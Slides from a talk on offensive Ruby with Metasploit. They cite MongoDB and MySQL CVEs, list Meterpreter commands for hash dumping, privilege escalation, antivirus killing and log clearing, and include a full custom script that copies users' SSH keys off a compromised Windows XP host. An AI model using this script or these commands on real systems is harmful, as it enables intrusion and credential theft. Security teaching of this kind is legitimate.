Offensive Ruby Ausmarton Zarino Fernandes Developer/Consultant @ausmarton 

Vulnerability (CVE-2013-1892): Specially crafted calls to the nativeHelper function in SpiderMonkey in MongoDB, could be used to exploit. Affects: • MongoDB < 2.0.9 and 2.2.x < 2.2.4 • x86 Linux Exploit Ref: www.exploit-db.com/exploits/24935/ Offensive Ruby: Exploiting MongoDB/Ubuntu 

• Payload (not an exploit) • In-memory DLL injection • Dynamically extensible • Client supports many languages Offensive Ruby: Meterpreter 

Offensive Ruby: Meterpreter Victim Metasploit Framework Exploit + Payload (Stage 1) Target Process Remote code execution Connect back to MSF DLL Injection Payload (Stage 2) Meterpreter Server DLL Meterpreter Server Meterpreter Client TLS/1.0 with TLV Encrypted communication between Meterpreter Client and Server IRB Shell PHP Shell 

• Core irb, migrate, sessions, background • Stdapi mkdir, ifconfig, route, shell, clearev, screenshot • Priv getsystem, hashdump Offensive Ruby: Meterpreter Commands 

Scripts provide more features and can be used with “run” • checkvm • killav • hostedit • winenum Offensive Ruby: Bundled Scripts 

Vulnerability (CVE-2012-5613): FILE privilege misconfiguration in MySQL can be exploited on Windows with the use of an MOF file Affects(Tested on): • MySQL 5.0.45 • Windows XP SP3 Exploit Ref: www.exploit-db.com/exploits/23179/ Offensive Ruby: Exploiting MySQL/Windows 

• client client.sys.config client.sys.process client.net.config • Create your .rb in /usr/share/metasploit-framework/scripts/meterpreter • “run <script>” from meterpreter Offensive Ruby: Custom Scripts 

def profile_path(profiles_reg_key, sid) sys_drive_var = "%SystemDrive%" system_drive = client.fs.file.expand_path(sys_drive_var).to_s registry_getvaldata(profiles_reg_key + "\\" + sid,"ProfileImagePath") .gsub!(/\0/,'').sub(sys_drive_var, system_drive) end if client.sys.config.sysinfo['OS'].include? "Windows XP" then print_status "Windows XP found, trying to get user list" profiles_reg_key = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList" registry_enumkeys(profiles_reg_key).flatten.each do |sid| path = profile_path(profiles_reg_key, sid) unless path.include? "systemprofile" ssh_keys_dir = path + "\\.ssh" if client.fs.file.exists? ssh_keys_dir print_status "Downloading ssh keys from #{ssh_keys_dir}" client.fs.dir.download("/tmp/", "#{ssh_keys_dir}") end end end else print_error "Victim is not running Windows XP, giving up!" end Offensive Ruby: Fetching contents of .ssh 

• www.offensive-security.com/metasploit-unleashed • www.github.com/rapid7/meterpreter • www.exploit-db.com • Harmony Security's paper on Reflective DLL Injection Offensive Ruby: References